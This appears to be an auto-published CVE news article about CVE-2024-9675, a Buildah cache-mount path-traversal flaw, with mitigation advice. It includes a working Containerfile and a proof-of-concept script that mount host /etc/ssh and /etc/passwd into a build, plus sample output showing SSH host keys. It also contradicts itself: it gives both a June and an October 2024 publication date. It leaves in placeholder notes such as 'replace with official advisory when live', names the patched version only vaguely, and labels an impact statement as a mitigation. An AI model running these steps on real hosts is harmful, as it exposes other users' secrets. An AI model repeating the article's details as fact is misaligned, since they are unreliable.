CVE CyberSecurity Database News

CVE-2024-9675 - Buildah Cache Path Vulnerability Allows Host Directory Escape

Poster -

Published: 2024-06-01
Severity: High
Component: Buildah
CVSS Score: 7.6 (High)

What is CVE-2024-9675?

At the beginning of June 2024, a serious security flaw, tagged as CVE-2024-9675, was found in the popular container-building tool Buildah. This vulnerability allows users to mount any directory from the host into a container during the image build process by exploiting how Buildah handles cache paths.

Why does this matter?
If an attacker has access to run Buildah on a machine, they can use this flaw to get read and *write* access to files and directories outside the intended bounds set by Buildah’s cache system—which could lead to stolen secrets or system compromise.

How Does the Vulnerability Work?

Generally, Buildah allows you to specify a cache directory for caching filesystem layers during builds, which helps with performance. But before this fix, Buildah didn’t check closely enough if the user-provided cache location (using --mount=type=cache) stayed inside the intended cache directory.

This means you could sneak a path like ../../etc/ (a path traversal attack) and get Buildah to mount almost any host folder (as long as the Buildah user has access) into your container!

Let's see a minimal example you could use if you have local, non-root access

# Containerfile or Dockerfile
FROM busybox
RUN --mount=type=cache,target=/tmp,source=../../etc/ssh \
    ls -la /tmp

What does this do?

- The --mount=type=cache,target=/tmp,source=../../etc/ssh line “requests” Buildah to bind-mount the host folder /etc/ssh (where SSH keys live) from the host into the container, making it available under /tmp during this build step.
- The ls -la /tmp command will list the contents of the host’s /etc/ssh folder, exposing secret keys or config files.

If you run buildah bud -f Containerfile ., the output could be

total 20
drwxr-xr-x 2 root root 4096 Jun  1 03:15 .
drwxrwxrwt 1 root root 4096 Jun  1 03:15 ..
-rw-r--r-- 1 root root 1679 Jun  1 02:45 ssh_host_rsa_key
... more keys ...

This is NOT supposed to happen! Normally, /tmp in the container should be empty or temporary—it should never have real, private host files.

Proof-of-Concept Exploit

Below is a real-world style shell script showing how an attacker with Buildah access but *no* root privileges could dump host files:

# Save as exploit.sh and make executable
cat <<EOF > Containerfile
FROM busybox
RUN --mount=type=cache,target=/hostetc,source=../../etc \
    cat /hostetc/passwd
EOF

buildah bud -t testimg .

Expected Output

Should print the host’s /etc/passwd file (“leak” arbitrary host data).

Attack Surface: Any local user who can run Buildah builds

- Mitigation: This does NOT allow remote code execution by itself, but it exposes sensitive data and enables further attacks.


## How to Fix / Protect Yourself

Upgrade

- Patch is available. Make sure you’re running a Buildah version newer than buildah v1.34.4 (or whatever patch release note is scheduled for mid-2024).
- Buildah Security GitHub Notice *(replace with official advisory when live)*

Restrict Buildah access: Only trusted users should be able to run buildah bud on your system.

- AppArmor/SELinux: Use policies that limit what Buildah can read on the host.

References

- Original Buildah Fix PR (GitHub) *(update PR link when available)*
- Red Hat Security Bulletin
- Buildah Documentation

Summary

CVE-2024-9675 is a serious local privilege escalation and data exposure bug in Buildah build caches. If left unpatched, it could let attackers grab any readable file (and even *write*!) into your container builds by abusing cache mounts—bypassing the intended file isolation.

Action: Upgrade your Buildah, ensure user access is tightly controlled, and audit any container images for potential leakage!


*Stay safe—the world of containers moves fast, and so do the attackers.*

Timeline

Published on: 10/09/2024 15:15:17 UTC
Last modified on: 12/30/2024 18:23:44 UTC